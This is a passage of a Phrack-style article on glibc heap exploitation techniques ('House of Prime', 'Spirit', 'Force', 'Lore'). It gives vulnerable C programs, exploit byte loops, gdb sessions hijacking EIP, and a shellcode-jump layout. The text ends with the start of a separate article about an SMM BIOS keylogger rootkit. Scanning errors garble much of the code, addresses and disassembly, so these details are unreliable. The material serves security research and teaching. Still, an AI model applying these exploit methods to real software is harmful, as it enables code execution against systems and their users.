The next mission is to overwrite the value of "arena_key" (read Malloc 
Maleficarum for details) which is typically above "av" (&main_arena). 


As we can use chunks of very large sizes, we can make that 
&(av->fastbins[x]) points very far. At least enough to reach the 
value of "arena_key" and overwrite it with the "p" address. 
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Taking the example of Phantasmal, we would have to resize the second chunk 
to with the next value: 


1156 bytes / 4 = 289 
(289 + 2) << 8 2328 = 0x918h -> 0x919 (PREV_INUS 


Gl 
~~ 


You have to check again the "size" field of the next chunk, whose address 
is calculated from the value that we obtain a moment ago. 


You can continue your exploit: 


for (i = 0; i < 1020; i++) 
putchar (0x41); 
fwrite ("\x19\x09\x00\x00", 4, 1, stdout); /* free(2) ptr2 size */ 
/* Later */ 


for (i = 0; i < (2000 / 4); itt) 
fwrite("\x10\x00\x00\x00", 4, 1, stdout); 


At the end of the second free (): arena_key = p2. 


This value will be used by the call to malloc () setting it as the "arena" 
structure to use. 


arena_get(ar_ptr, bytes); 
if('ar_ptr) 

return 0; 
victim = _int_malloc(ar_ptr, bytes); 


Again, let’s go to see, to be more intuitive, the magic code of 
""“int_malloc()" function: 


if ((unsigned long) (nb) <= (unsigned long) (av->max_fast)) { 
long int idx = fastbin_index (nb) ; 
fb = &(av->fastbins[idx]); 
if ( (victim = *fb) != 0) { 
if (fastbin_index (chunksize (victim)) != idx) 
malloc_printerr (check_action, "malloc(): memory" 


"corruption (fast)", chunk2mem (victim) ); 


*fb = victim-—->fd; 
check_remalloced_chunk (av, victim, nb); 
return chunk2mem(victim) ; 


W 


"av" is now our arena, which starts at the beginning of the second chunk 
liberated "p2", then it is clear that "av->max_fast" will be equal to the 
"size" field of the chunk. In order to pass the first integrity check, we 
have to ensure that the size requested by the "malloc()" call is less than 
that value, as Phantasmal said, otherwise you can try the technique 
described in 4.2.1. 


As our vulnerable program allocate 1024 bytes, it will be perfect por a 
successful exploitation. 


Then we can see that "fb" is set to address of a "fastbin" in "av", and in 
the following sentence, its content will be the final address of "victim". 
Remember that our goal is to allocate an amount of bytes into a place of 
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our choice. 
Do you remember / * Later * / ? 


Well, that is where we need to copy repeatedly the address that we want 
in the stack, so any return "fastbin" set our address in "fb". 


Mmmmm, but wait a moment, the next condition is the most important: 

if (fastbin_index (chunksize (victim)) != idx) 
This means that the "size" field of our fakechunk must be equal to the 
amount requested by "malloc()". This is the last requirement in The House 


of Prime. We must control a value into memory and place address of 
"victim" just 4 bytes before, so this value would become its new size. 


Our vulnerable application get as parameters: "name", "surname" and "age". 
This last value is an integer that will be stored in the stack. If we 
make: age = 1024->(1032), we only must look for it into the stack to know 


the final address of "victim". 


(gdb) run Black Ngel 1032 < file 
ptr found at [ 0x80b2a20 ] 
ptrlovf found at [ 0x80b2e28 ] 
ptr2ovf found at [ 0x80b3230 ] 
Escriba una descripcion: 

END free(l1) 


END free(2) 
Breakpoint 2, 0x080482d9 in fvuln () 


(gdb) x/4x $ebp—32 
Oxbf£fff£838: 0x00000000 0x00000000 Oxb£000000 0x00000408 


Here we have our value, we should point to "Oxbffff840". 


for (i = 0; i < (600 / 4); itt) 
fwrite("\x40\xf8\xff\xbf", 4, 1, stdout); 


You should have: ptr3 = malloc(1024) = Oxbffff848, remember that it 
returns a pointer to the memory (data area) and not to chunk’s header. 


We are really close to EBP and EIP. What happens if our "name" is 
composed by a few letters "A"? 


(gdb) run Black ‘perl -e ’print "A"x64’* 1032 < file 
ptr found at [ 0x80b2a20 ] 

ptrlovf found at [ 0x80b2e28 ] 

ptr2ovf found at [ 0x80b3230 ] 

Escriba una descripcion: 

END free(l1) 


END free(2) 
Breakpoint 2, 0x080482d9 in fvuln () 
(gdb) c 


Continuing. 


END malloc() 


Breakpoint 3, 0x08048307 in fvuln () 
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(gdb) c 
Continuing. 


Program received signal SIGSEGV, Segmentation fault. 
0x41414141 in ?? () 
(gdb) 


Bingo! I think that you can put your own Shellcode, right? 


Actually, addresses require manual adjustments, but that is trivial when 
you know write "gdb" in your shell. 


At first, this technique is only applicable to version 2.3.6 of GLIBC. 
Later was added in the "free()" function an integrity check like this: 


/* We know that each chunk is at least MINSIZE bytes in size. */ 
if (__builtin_expect (size < MINSIZE, 0)) 
{ 


errstr = "free(): invalid size"; 
goto errout; 


} 


check_inuse_chunk (av, p); 


Which does not allow us to establish a smaller size than "16". 


In honor to the first house developed and built by Phantasmal we have 
shown that it is possible to arrive alive at The House of Prime. 


<< La tecnica no solo es una 
modificacion, es poder sobre 
las cosas. >> 


[ Xavier Zubiri ] 


=-+[) 4.231 -S==[ unsorted_chunks () iss 


Until the call to "malloc()", the technique is exactly the same as 
described in 4.2. The difference comes when the amount of bytes that you 
want to alloc with that call is over "av->max_fast", which appears to be 
the size of the second chunk passed to free(). 


Then, as Phantasmal advanced us, another piece of code can be triggered so 
that we will can overwrite an arbitrary address of memory. 


But again he was wrong when he said: 
"Firstly, the unsorted_chunks() macro returns av->bins[0]." 
And this is not true, because "unsorted_chunks ()" returned address of 


"av->bins[0]" and not its value, which means that we must devise another 
method. 


Being these lines the most relevant: 
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victim = unsorted_chunks (av) ->bk 
bck = victim->bk; 


unsorted_chunks (av) ->bk = bck; 
bck->fd = unsorted_chunks (av) ; 


I propose the following method: 


1) Put at é&av->bins[0]+12 the address of (&av-—>bins[0]+16-12). Then: 


victim = &av->bins[0]+4; 


2) Put at &av->bins[0]+16 address of EIP —- 8. Then: 


bck = (&av->bins[0]+4)->bk av->bins[0]+16 = &EIP-8; 


3) Put at av->bins[0] a "JMP OxYY" sentence to jump at least as far 
as &av->bins[0]+20. In the penultimate sentence it will destroy 
é&av—->bins[0]+12, but it is not important now, to the end we will 
have: 


bck->fd EIP &av->bins[0]; 


4) Put (NOPS + SHELLCODE) from &av->bins[0] + 20. 


When a "ret" instruction is executed, it will go to our "JMP" and this 
fall directly on the NOPS, moving east until the shellcode. 


We should have something like this: 


&av—->bins [0] é&av—->bins[0]+12 &av—>bins[0]+16 
ie JMP Ox16 ]..... een nT ee. EIP — 8][ NOPS + SHELLCODE ]... 
2) = | 
(1) 
(1) This happens here: bck = (&av—->bins[0]+4)->bk. 


(2) This happens after the execution of a "ret" 


The great advantage of this method is that we can achieve a direct 
arbitrary code execution instead of returning a controlled chunk from 
"malloc()". 


Perhaps through this clever way you can directly reach The House of Prime. 


<< Felicidad no es hacer lo que 
uno quiere, sino querer lo que 
uno hace. >> 


[ J. P. Sartre ] 


on. -4..33. F-= THE HOUSE OF SPIRIT I eestor 


The House of Spirit is, undoubtedly, one of the most simple applied 
technique when circumstances are propitious. The goal is to overwrite 
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a pointer that was previously allocated with a call to "malloc()" so 
that when this is passed to free(), an arbitrary address will be stored 
in a "fastbin[]". 


This can bring that in a future call to malloc(), this value will be taken 
as the new memory for the requested chunk. And what happens if I do that 
this memory chunk to fall into any specific area of stack? 


Well, if we can control what we write in, we can change everything value 
that is ahead. As always, this is where EIP enters to the game. 


Let’s go to see a vulnerable program: 


include <stdio.h> 
include <string.h> 
include <stdlib.h> 


void fvuln(char *strl, int age) 


static char *ptrl, name[32]; 
int local_age; 
char *ptr2; 


local_age = age; 


ptrl = (char *) malloc(256); 
printf("\nPTR1 = [ %p J", ptrl); 
strcpy(name, strl) 
printf("\nPTR1 = [ 


free(ptrl); 
ptr2 = (char *) malloc(40); 


snprintf(ptr2, 40-1, "Ss is %d years old", name, local_age); 
printf("\nss\n", ptr2); 
} 


int main(int argc, char *argv[]) 
{ 
if (argc == 3) 
fvuln(argv[1], atoi(argv[2])); 


return 0; 


It is easy to see how the "strcpy()" function allow to overwrite the 
"ptr1l" pointer: 


blackngel@mac:~$ ./hos ‘perl -e '’print "A"x32 . "BBBB"’ * 20 
PTR1 = [ 0x80c2688 ] 
PTR1L = [ 0x42424242 |] 


Segmentation fault 


With this in mind, we can change the address of the chunk, but not all 
addresses are valid. Remember that in order to execute the "fastbin" code 
described in The House of Prime, we need a minor value than "av->max_fast" 
and, more specifically, as Phantasmal said, it has to be equal to the size 
requested in the future call to "malloc()" + 8. 


So as one of the arguments in our application is the "age" parameter, we 
can put any value in the stack, which in this case will be "0x48", and 
seek its address. 
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(gdb) x/4x Sebp-4 
OxbfffF314: 0x00000030 Oxbffff£338 0x080482ed 


Oxbffff702 


In our case we see that the value is just behind EBP, and PTR1 would must 


point 


to EBP. 


the chunk’s address. 


Remember that we are modifying the pointer to memory, not 


The most important requirement to success of this technique is pass the 
integrity check of the next chunk: 


at 


if (chunk_at_offset (p, 
__builtin_expect 


size)->size <= 2 * SIZE SZ 


(chunksize (chunk_at_offset (p, size) ) 


>= av->system_mem, 0) 


SEBP - 4 + 48 we must have a value that meets the abov 


) 


conditions. 


Otherwise you should look for another addresses of memory that can allow 
you to control both values. 


(gdb) 


x/4x Sebp—4+48 
OxbfffFf344: 


0x0000012c 


I will shown what it happens: 


Oxbfff£568 0x080484eb 
target val2 
| fo) 
0 t4 +8 +12 +16 | 
| | | | | | 
BBP] [EIP][..][..][..] [next_size] [ 


(size + 8) bytes 


---> Future PTR2 


vall 
fe) 
-64 | mem -4 
| | 
ane eei ] [P_SIZE] [size+8] saesli [ 
| 
fe) 
PTR1 
(target) Value to overwrite. 
(mem) Data of fakechunk. 
(vall) Size of fakechunk. 
(val2) Size of next chunk. 


If this happens, 


blackn 
(gdb) 


0x0804 
0x0804 
0x0804 
0x0804 
0x0804 


control will be in our hands: 


gel@linux:~$ gdb -q ./hos 
disass fvuln 
Dump of assembler code for function fvuln: 


81f 
81f 
81f 

81f6 
81f£9 
81fc 
8203 


8230 


8252 
8257 
825e 


0x0804 


82a3 
82a4 


< 


NAKA AK AA 


fvu 


fvul 
fvul 
fvul 
fvul 
fvul 
fvul 


t+O>: 
Ps 
+3>: 
t+6>: 
t+9>: 
t12>: 
t+19>: 


t+64>: 


t+98>: 


t+103>: 
t+110>: 


t179>:; 
t+180>: 


push 
mov 
sub 
mov 
mov 
movl 
call 


call 


Sebp 

Sesp, sebp 
$0x28,%esp 

Oxc (Sebp) , seax 
seax, —-0x4 (Sebp) 
$0x100, (esp) 
Ox804£440 <malloc> 


Ox80507a0 <strcpy> 


Ox804da50 <free> 
$0x28, (esp) 
O0x804£440 <malloc> 


0x00000003 


10.txt Wed Apr 26 09:43:46 2017 30 


End of assembler dump. 


(gdb) break *fvulnt+19 /* Before malloc() */ 
Breakpoint 1 at 0x8048203 


(gdb) run ‘perl -e /print "A"x32 . "\x18\xf3\xff\xbf"’* 48 


Breakpoint 1, 0x08048203 in fvuln () 
(gdb) x/4x Sebp-4  /* 0x30 = 48 */ 
Oxbf£fff£314: 0x00000030 Oxb£ff££338 0x080482ed Oxbfff£702 


(gdb) x/4x Sebp-4+48 /* 8 < 0xl2c < av->system_mem */ 
Oxbffff344: 0x0000012c Oxbffff568 0x080484eb 0x00000003 


(gdb) c 
Continuing. 


PTR1 
PTR1 


[ 0x80c2688 ] 
[ Oxbffff318 | 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


Program received signal SIGSEGV, Segmentation fault. 
0x41414141 in ?? () 


In this special case, the address of EBP would be the address of PTR2 zone 
data, which means that the fourth write character will overwrite EIP, and 
you will can point to your Shellcode. 


This technique has the advantage, once again, to remain applicable in 
the newer versions of glibc so as PTMALLOC3. Must be known that the 
Phantasmal’s theory still remain to the pass of the time. 


Now you can feel the power of witches. We arrived, flying in broom at The 
House of Spirit. 


<< La television es el espejo donde 
se refleja la derrota de todo 
nuestro sistema cultural. >> 


[ Federico Fellini ] 


---[ 4.4 ---[ THE HOUSE OF FORCE Le 


The top chunk (Wilderness), as I mentioned earlier in this article may be 
one of the most dreaded chunks. Sure, it is treated in a special way by 
the free() and malloc() functions, but in this case will be the trigger 
for a possible arbitrary code execution. 


The main goal of this technique is to reach the next piece of code in 
""int_malloc ()": 


use_top: 
victim = av->top; 
size = chunksize(victim); 
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if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZI 


GJ 
~~ 
~~ 
a 


remainder_size = siz nb; 
remainder = chunk_at_offset (victim, nb); 
av->top = remainder; 
set_head(victim, nb | PREV_INUSE | 
(av != &main_arena ? NON_MAIN_ ARENA : 0)); 
set_head(remainder, remainder_siz | PREV_INUSE) ; 


check_malloced_chunk (av, victim, nb); 
return chunk2mem(victim) ; 


This technique requires thr conditions: 
1 - One overflow in a chunk that allows to overwrite the Wilderness. 
2 - A call to "malloc()" with size field defined by designer. 
3 - Another call to "malloc()" where data can be handled by designer. 


The ultimate goal is to get a chunk placed in an arbitrary memory. This 
position will be obtained by the last call to "malloc()", but first we 
must analyse more things. 


Consider first a possible vulnerable program: 


include <stdio.h> 
include <string.h> 
include <stdlib.h> 


void fvuln(unsigned long len, char *str) 


char *ptirl,, *per2;, “pers? 


ptrl = malloc(256); 
printf("\nPTR1 = [ 
strcpy(ptrl, str); 


sp ]\n", ptrl); 


printf("\Allocated MEM: %u bytes", len); 
ptr2 = malloc(len); 
ptr3 = malloc(256); 


strncpy(ptr3, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAA", 256); 
} 


int main(int argc, char *argv[]) 
{ 
char *pEnd; 
if (argc == 3) 
fvuln(strtoull(argv[1], &pEnd, 10), argv[2]); 


return 0; 


Phantasmal said that the first thing to do was to overwrite the 

Wilderness chunk so that its "size" field was as high as possible, 
as well as "Oxffffffff". Since our first chunk is 256 bytes long, 
a 
fe) 


nd it is vulnerable to overflow, 264 characters "\xff" achieve the 
bjective. 


This ensures that any request of memory enough large, is treated with 
the code "_int_malloc()", instead of expand the heap. 
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The second goal, is to alter "av->top" so it points to a memory area under 
designer control. We (it’s view in next section) will work with the stack, 
particularly with the EIP target. In fact, the address that should be 
placed in "av->top" is EIP 8, because we are dealing with the chunk 
address, and the return data area is 8 bytes later, there where we will 
write our data. 


But... How hack "av->top"? 
victim = av->top; 
remainder = chunk_at_offset (victim, nb); 
av->top = remainder; 


"victim" get address of the current Wilderness chunk, that in a normal 
case we could see so as: 


PTR1 = [ 0x80c2688 ] 
Ox80bf550 <main_arenat48>: 0x080c2788 
As we can see, "remainder" is exactly the sum of this address plus the 


number of bytes requested by "malloc ()". This amount must be controlled 
by the designer as mentioned above. 


Then, if EIP is "Oxbffff22c", the address that we want placed at remainder 
(which will goes direct to "av->top") is actually this: "Oxbfffff24". And 
now we know where this "av->top". Our number of bytes to request are: 


Oxbff£f£224 - 0x080c2788 = 3086207644 


I exploited the program with "3086207636", which again, is due to the 
difference between the position of the chunk and data area of Wilderness. 


Since that time, "av->top" contain our altered value, and any request that 
triggers this piece of code, get this address as its data zone. Everything 
that is written will destroy the stack. 


GLIBC 2.7 do the next: 


void *p = chunk2mem(victim) ; 

if (__builtin_expect (perturb_byte, 0)) 
alloc_perturb (p, bytes); 

return p; 


Let’s to go: 


blackngel@linux:~$ gdb -q ./hof 

(gdb) disass fvuln 

Dump of assembler code for function fvuln: 
0x080481f0 <fvuln+0>: push Sebp 

0x080481f1 <fvuln+l1>: mov sesp, sebp 
0x080481f3 <fvulnt+3>: sub $0x28,%esp 
0Ox080481f6 <fvulnt+6é>: movil $0x100, (esp) 
0x080481fd <fvulnt13>: call 0x804d3b0 <malloc> 
0x08048225 <fvuln+53>: call Ox804e710 <strcpy> 
0x08048243 <fvulnt83>: call Ox804d3b0 <malloc> 
0x08048248 <fvuln+88>: mov Seax, —-0x8 (Sebp) 
0x0804824b <fvuln+91>: movl $0x100, (Sesp) 
0x08048252 <fvulnt98>: call Ox804d3b0 <malloc> 
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0x08048270 <fvuln+128>: call 0x804e7f0 <strncpy> 
0x08048275 <fvulnt+133>: leave 

0x08048276 <fvulnt+134>: ret 

End of assembler dump. 


(gdb) break *fvuln+83 /* Before malloc(len) */ 
Breakpoint 1 at 0x8048243 


(gdb) break *fvulnt+88 /* After malloc(len) */ 
Breakpoint 2 at 0x8048248 


(gdb) run 3086207636 ‘perl -e '’print "\xff"x264’ * 


PTR1 = [ 0x80c2688 |] 


Breakpoint 1, 0x08048243 in fvuln () 
(gdb) x/16x &main_arena 


Ox80bf550 <main_arenat48>: 0x080c2788 0x00000000 Ox080bf550 O0Ox080bf550 


| 
(gdb) c av->top 
Continuing. 


Breakpoint 2, 0x08048248 in fvuln () 
(gdb) x/16x &main_arena 


Ox80bf550 <main_arenat48>: Oxbffff220 0x00000000 Ox080bf550 O0x080bf550 


point to stack 
(gdb) x/4x Sebp-8 


Oxbffff220: 0x00000000 0x480c3561 OxbffffF258 0x080482cd 
| 

(gdb) c important 

Continuing. 


Program received signal SIGSEGV, Segmentation fault. 
0x41414141 in ?? () /* Our application smash the stack itself */ 
(gdb) 


Yeah! So it was possible!!! 


I pointed out one value as "important" in the stack, and it is one of 

the last condition for a successful implementation of this technique. 

It requires that the "size" field of the new Wilderness chunk, been at 
least greater than the request made by the last call to "malloc()". 


NOTE: As you have seen in the introduction of this article, g463 wrote a 
paper about how to take advantage of the set_head() macro in order 
to overwrite an arbitrary memory address. This would be strongly 
recommendable that you read this work. He also presented a briew 
research about The House of Force... 


Due to a serious error of mine, I did not read this article until 
a Phrack member warned me of its existence after I had edited my 
article. I can’t avoid feeling amazed at the level of skills these 
people are reaching. The work of g463 is really smart. 


In conclusion to this technique, I asked what would happen if, instead of 
what we have seen, the vulnerable code would looks like: 


char buffer[64]; 
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ptr2 = malloc(len); 
ptr3 = calloc(256); 


strncpy (buffer, argv[1], 63); 


At first, it is quite similar, only the last chunk of memory allocated is 
done through the function "calloc()" and in this case do not control their 
content, but we control a buffer declared at the beginning of the 
vulnerable function. 


Faced with this obstacle, I had an idea in mind. If it remains possible 
return an arbitrary piece of memory and since calloc() will fill it with 
"O's", perhaps it could be placed so that the last NULL byte "0" may 
overwrite the last byte of a saved EBP, so this is passed finally to ESP, 
and may control the return address from within our buffer[]. 


But soon I warned that the alignment of malloc() algorithm when this is 
called, thwarts this possibility. We could overwrite EBP completely with 
"0's", which is useless for our purposes. And besides, always there to 
take care not to crush our buffer[] with zeros if the reserve of memory 
occurs after the content has been established by the user. 


And it is all... As always, this technique also remains being applicable 
with the latest versions of glibc (2.8.90). 


We have arrived, pushed by the power of force, to The House of Force. 


<< La gente comienza a plantearse 
Si todo lo que se puede hacer 
se debe hacer. >> 


[ D. Ruiz Larrea ] 


S22 ea k ===" MISTAK 


El 
n 


] See 


In fact, what we have done in the previous section, the fact of using the 
stack was the only viable solution that I found, after realize som rrors 
that Phantasmal had not expected. 


The point is that the description of his technique, he raised th 
possibility of overwrite targets as .dtors or Global Offset Table. 
But I soon realized that this did not seem possible. 


Given that "av->top" was: [0x080c2788]. In a short analysis like this... 


blackngel@linux:~$ objdump -s -j .dtors ./hof 
Contents of section .dtors: 

80be47c ffffffff 20480908 00000000 

Contents of section .got: 

80be4b8 00000000 00000000 


we can see that both addresses are behind the address of "av->top", 
and an amount not lead us to these addresses. Function pointers, the BSS 
region, and also other things are behind... 


If you want to play with negative numbers or integer overflows, I allow 
that you to make all neccesary tests. 


It is by this that the Malloc Maleficarum did not mention that the 
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designer controlled value to allocate memory, should be an "unsigned" or, 
otherwise, any value greater than 2147483647 will change its sign directly 
to become a negative value, which ends at most cases with a segmentation 
fault. 


He doesn’t think this because he think that he could overwrite memory 
positions that were at highest addresses that the Wilderness chunk, bu 
not as far as "Oxbffffxxx". 


Imposible is nothing in this world, and I know that you can feel The Hous 
of Force. 


<< La utopia esta en el horizonte. Me 
acerco dos pasos, ella se aleja dos 
pasos. Camino diez pasos y el horizonte 
se corre diez pasos mas alla. Por 
mucho que yo camine, nunca la alcanzare. 
Para que sirve la utopia? Para eso 
Sirve, para caminar. >> 


[ E. Galeano ] 


= 


sH= [hed HS THE HOUSE OF LOR 


[7] 


| ——— 


This technique will be detailed here in a theoretical way to express what 
Phantasmal supposedly wanted to say in his Malloc Maleficarum paper. 


The House of Lore requires triggering numerous calls to "malloc()" what 
seems not to be a designer controlled value and turns into something 
unreal. 


But I again repeat the same thing I said at the end of the technique The 
House of Mind (CVS vulnerability). And the same showed case is perfect for 
the conditions that should meet in The House of Lore. We need multiple 
calls to malloc( ) controlling their sizes. 


To give a simple explanation, we will approach to the topic through 
schemes. 


When a chunk is stored in your appropriated "bin", it is inserted as the 
first: 


1) Calculating the index for the chunk’s size: 
victim_index = smallbin_index(size); 

2) Get the proper bin: 
bck = bin_at(av, victim_index); 

3) Get the first chunk: 
fwd = bck->fd; 

4) Pointer "bk" of chunk points to the bin: 
victim->bk = bck; 


5) Pointer "fd" of chunk points to the previous 
first chunk at bin: 


victim->fd = fwd; 
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6) Pointer "bk" of the next chunk points to our 
inserted chunk: 


fwd->bk = victim; 
7) Pointer "fd" of the "bin" points to our chunk: 


bck->fd = victim; 


bin->bk bin->fwd 
fe) [bin] fe) 

] A A ] 
[last] | [victim] 
onal 1->fwd v->bk fal 
|! |! 
ernceral bstcers'l 
\\ // 

[ ] [ ] 


Into "unlink code", if "victim" is taken from "bin->bk, it may be 
necessary to repeat numerous calls to malloc() until the "victim" reach 
the "last" position. 


Let’s s the code to discover a few things: 


if ( (victim = last(bin)) != bin) { 

if (victim == 0) /* initialization check */ 
malloc_consolidate (av); 

else { 
bck = victim->bk; 
set_inuse_bit_at_offset (victim, nb); 
bin->bk = bck; 
bck->fd = bin; 


return chunk2mem(victim) ; 


In this technique, Phantasmal said that the ultimate goal was to overwrite 
"bin->bk," but the first element that we can control is "victim->bk". As 
far as I can understand, we must ensure that the overflowed chunk passed 
to "free ()" is in the previous position to "last", so that "victim-—->bk" 
point to its address, that we must control and should point to the stack. 


This address is passed to "bck" and then will change "bin->bk". Due to 
this, we now control the "last" chunk with a designer controlled address. 


That is why we need a new call to "malloc()" with same size as the 
previous call, so that this value is the new "victim" and is returned in: 


return chunk2mem (victim); 


*ptrl -—> modified; 


First call to "malloc()": 
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[chunk] [chunk] [chunk] 
| | 
! bk bk | 
[bin] ----- >[last=victim] ----- >[ ptrl j---/ 
2 |e | 
fwd < fwd 


return chunk2men (victim); 


Second call to "malloc()": 


[chunk] chunk] [chunk] 
| | 
! bk bk | 
[bin] ----- > per Sah saesa5 >[ chunk ]---/ 
. [igre | 
fwd . fwd 


One must be careful with that also overwrites "bck->fd" in turn, in the 
stack it is not a big problem. 


It is for this reason that if your interest is really enough, my tip is 
that you don’t pay much attention to The House of Prime, as indicated 
Phantasmal in his paper, instead, consider again the House of Spirit. 


In theory, using a similar technique, a false chunk should can been sited 
in its corresponding "bin" and trigger a further call to "malloc()" that 
could returns the same memory space. 


Remember that the size of allocated chunk must be greater than 
"av—->max_fast" (72), and less than 512 to execute "small bin" code instead 


of fastbin code: 
define NSMALLBINS 64 
define SMALLBIN WIDTH MALLOC_ALIGNMENT 
define MIN LARGE SIZE (NSMALLBINS * SMALLBIN WIDTH) 
64] * [8] = [512] 


For "largebin" method will have to use larger chunks than this estimated 
size. 


Like all houses, it’s only a way of playing, and The House of Lore, 
although not very suitable for a credible case, no one can say that 
is a complete exception... 


<< La humanidad necesita con urgencia 
una nueva sabiduria que proporcione 
el conocimiento de como usar el 
conocimiento para la supervivencia 
del hombre y para la mejora de la 
calidad de vida. >> 


[ V. R. Potter ] 
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---[ 4.6 ---[ THE HOUSE OF UNDERGROUND ies 


Well, this house really was not described in Phantasmal Phantasmagoria’s 
paper, but it is quite useful to describe a concept that I have in mind. 


In this world are all possibilities. Chances that something goes well, or 
chances of something going wrong. In the world of the vulnerabilities 
exploitation, this remains true. The problem is to get the neccesary 
skills to find these possibilities, usually the possibility of that 
something goes well. 


Speaking at this time to unite several of the prior techniques in a same 
attack should not be so strange, and sometimes could be the most 
appropriate solution. Recall that g463 is not satisfied with the technique 
The House of Force to work on the vulnerability of the file (1) utility, 
but he was looking for new possibilities so that things come out well. 


For example ... what about using in a same instant the The House of Mind 
and The House of Spirit methods? 


Consider that both have their own limitations. On the one hand, The House 
Mind need as has been said a piece of memory in an above address that 
"0x08100000", while The House of Spirit, states that once the pointer to 
be free()ed has been overwritten, a new call to malloc() will be done. 


In The House of Mind, the main goal is to control the "arena" structure 
and this change starts with the modification of the third bit less 
Significant of the size field of the overwritten chunk (P). But the fact 
we can modify this metadata, does not mean that we have control of the 
address of this chunk. 


In contrast, in The House of Spirit, we alter the address of P, through 
the manipulation of the pointer to the data area (*mem). But what happens 
if in your vulnerable application does not exist a new call to malloc() 
that will return an arbitrary piece of memory on the stack? 


You may still investigate new avenues, but I would not be assured that 
running. 


If we can change the pointer to be freed, like in The House of Spirit, 
this will be passed to free() in: 


public_fREe (Void_t* mem) 


We can make it point to some place like the stack or the environment. It 
should always be a memory location with data controlled by the user. Then 
th ffective address of the chunk would taken at: 


Pp = mem2chunk (mem) ; 


At this point we leave The House of The Spirit to focus on The House of 
Mind. Then again we must control the arena "ar_ptr" and, to achieve this, 
(&p + 4) should contain a size with the NON_MAIN_ARENA bit enabled. 


But that is not the most important thing here, the final question is: 
could you put the chunk in a place so that you can then control the area 
returned by "heap_for_ptr(ptr)->ar_ptr"? 


Remember that in the stack that would be something like "Oxbff00000". It 
seems quite difficult reach an address like this even introducing a 
padding into environment. 


But again, all ways should be studied, you could find a new method, and 
perhaps you call it The House of Underground... 
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<< Los apasionados de Internet han encontrado 
en esta opcion una impensada oportunidad 
de volver a ilusionarse con el futuro. No 
solo algunos disfrutan como enanos; creen 


que este instrumento agiganta y que, acabada 


la fragmentacion entre unos y otros, se ha 
ingresado en la era de la conexion global. 
Internet no tiene centro, es una red de 
dibujo democratico y popular. >> 


[ V. Verdu: El enredo de la red 


S==[i == ASLR and Nonexec Heap (The Future) (=== 


We have not discussed in this article about how to circumvent protections 
like memory address randomization (ASLR) and a non executable Heap . And 
we will not do, but something we can say about it. You should be aware 


that in all my basic exploits, I have hardcoded the majority o 
addresses. 


This way of working is not very reliable in the days we live i 


In all techniques presented in this paper, especially int The 


f the 


Meee 


House of 


Spirit or The House of Force, where all comes down to a stack overflow, we 
guess that it would be applicable the methods described in other papers 


released in Phrack magazine or extern publications that explai 


ned how to 


bypass ASLR protection and others about how to return into mprotect ( ) to 


bypass a non exectuable heap and things like that. 


Regarding to the first topic, we have a magic work, "Bypassing 
protection" [11] by Tyler Durden in Phrack 59. 


On the other hand, circumvent a non executable heap whether if 
present and our skills to find the real address of a function 
mprotect( ) to allow us to change the permissions of the pages 


PaX ASLR 
ASLR is 
like 


of memory. 


Since I started my little research and work to write this article, my goal 
has always been to leave this task as the homework for new hackers who 


have the strength to continue in this way. 


Finally, this is a new area for further research. 


<< Todo tiene algo de belleza pero 
no todos son capaces de verlo. >> 


[ Confucio ] 


So=/ 6; -S=[ THE HOUSE OF PHRACK ]--- 


This is just a way so you can continue researching. There is a 
of possibilities, and most of them still aren’t discovered. Do 
be the next? 


This is your house! 


[To finish, because Phrack admits "spirit oriented" articles, I 


world full 
you want 


will 
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venture to drop a simple comment. 


Anyone interested in Linux development had read ever interesting articles 
as "The Cathedral and the Bazar" and "Homesteading the Noosphere" of the 
arch-known founder of the Open Source movement, Eric S. Raymond. For this 
is not so, maybe they had read "Jargon File" or perhaps for others, the 
"Hacker How-To". It is the latter that we are interested, especially when 
Raymond mentions the following: 


* Don’t use a silly, grandiose user ID or screen name. 


<< The problem with screen names or handles deserves som 
amplification. Concealing your identity behind a handle 
is a juvenile and silly behavior characteristic of crackers, 
warez d0Q0dz, and other lower life forms. Hackers don’t do 
this; they’re proud of what they do and want it associated 
with their real names. So if you have a handle, drop it. 
In the hacker culture it will only mark you as a loser. >> 


As far as I understand, this means that all those who had written in 
Phrack are childhood, crackers, lower life forms and are marked in the 
hacker culture as losers. 


Is there some connection between our name and our skills, philosophy 
of life or our ethics in hacking? 


Me, in my sole opinion, if this is true, I am proud that Phrack admit into 
their lines to lower life forms. Lower life forms that have helped to 
raise the security level of the network of networks in ways unimaginable. 


To all of them, thanks!!! 


blackngel 


"Adormecida, ella yace 
con los ojos abiertos 
como la ascensin del Angel hacia arriba 
Sus bellos ojos de disuelto azul 
que responden ahora: "lo hare, lo hago! 
la pregunta realizada hace tanto tiempo. 


Aunque ella debe gritar 
no lo parece 
lo que pronuncia es mas que un grito 
Yo se qu 1 Angel debe llegar 
para besarme suavemente, como mi estimulo 
la aguja profunda penetra en sus ojos." 


* Versos 4 y 5 de "El beso del Angel Negro" 
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=---=[ A Real SMM Rootkit: Reversing and Hooking BIOS SMI Handlers ]=---= 


[ Filip Wecherowski ] 
[ core collapse <core_collapse@hush.com> ] 


--[ ABSTRACT 


The research provided in this paper describes in details how to reverse 
engineer and modify System Management Interrupt (SMI) handlers in the BIOS 
system firmware and how to implement and detect SMM keystroke logger. This 
work also presents proof of concept code of SMM keystroke logger that uses 
I/O Trap based keystroke interception and a code for detection of such 
keystroke logger. 


1 - INTRODUCTION 


2 — REVERSE ENGINEERING SYSTEM MANAGEMENT INTERRUPT (SMI) HANDLERS 
Qed, Brief Overview of BIOS Firmware 
2.2 - Overview of System Management Mode (SMM) 
2.3 - Extracting binary of BIOS SMI Handlers 
2.4 - Disassembling SMI Handlers 
2.5 - Disassembling "main" SMI dispatching function 
2.6 - Hooking SMI handlers 


3 -— SMM KEYLOGGER 


1 - Hardware I/O Trap mechanism 

2 - Programming I/O Trap to capture keystrokes 
.3 - System Management Mode keylogger payload 

4 —- I/O Trap based keystroke logger SMI handler 
5 — Multi-processor keylogger specifics 


WWW WW 


4 - SUGGESTED DE 


Wy 


ECTION METHODS 


1 - Detecting I/O Trap based SMM keylogger 
4.2 -—- General timing based detection 


5 -— CONCLUSION 


6 — SOURCE CODE 


6.1 - I/O Trap based System Management Mode keystroke logger 
6.2 -— Programming I/O Trap 
6.3 - Detecting I/O Trap SMI keystroke logger 


7 — REFERENCES 


--[ 1 - INTRODUCTION 


This work gives an overview of how code works in Systems Management Mode 
and how it can be Hi Jack!ed to inject malicious SMI code. As an example, 
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we show how to hijack SMI code and inject SMM keystroke logger payload. 


